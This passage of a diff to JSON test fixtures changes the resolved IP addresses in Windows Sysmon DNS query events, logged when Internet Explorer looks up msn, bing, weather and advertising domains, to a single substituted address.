Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -6028,7 +6028,7 @@ "ProcessId": "2736", "QueryName": "static-entertainment-eus-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;", + "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.064" }, @@ -6049,7 +6049,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -6058,7 +6058,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "event_id": "22", @@ -6081,7 +6081,7 @@ "ProcessId": "2736", "QueryName": "radarmaps.weather.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;" + "QueryResults": "type: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;" }, "process": { "thread": { @@ -6101,7 +6101,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6124,7 +6124,7 @@ "ProcessId": "356", "QueryName": "static-entertainment-eus-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;", + "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.455" }, @@ -6156,7 +6156,7 @@ "ProcessId": "2736", "QueryName": "tag.sp.advertising.com", "QueryStatus": "0", - "QueryResults": "type: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;", + "QueryResults": "type: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.494", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -6172,7 +6172,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6191,7 +6191,7 @@ "ProcessId": "2736", "QueryName": "www.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;" + "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "user": { "identifier": "S-1-5-18" @@ -6215,7 +6215,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -6226,7 +6226,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6258,7 +6258,7 @@ "ProcessId": "2736", "QueryName": "cdn.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;" + "QueryResults": "type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;" } } }, @@ -6271,7 +6271,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 